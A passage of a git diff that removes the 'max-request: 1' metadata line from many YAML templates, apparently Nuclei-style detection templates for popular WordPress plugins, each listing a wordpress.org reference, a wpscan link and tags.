wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 254f916291..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 575c9ebe67..840c086fb9 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index 2409c6b370..a8eca7b056 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: - max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c8acf8c625..43cb2ab09c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..6f06b49011 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: - max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index aa9153241e..5ce87e6c71 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8881e23860..8e1cb46cf0 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 0bc823830f..c45ef4bf89 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index 7fbeea5917..a224d85727 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: - max-request: 1 plugin_namespace: 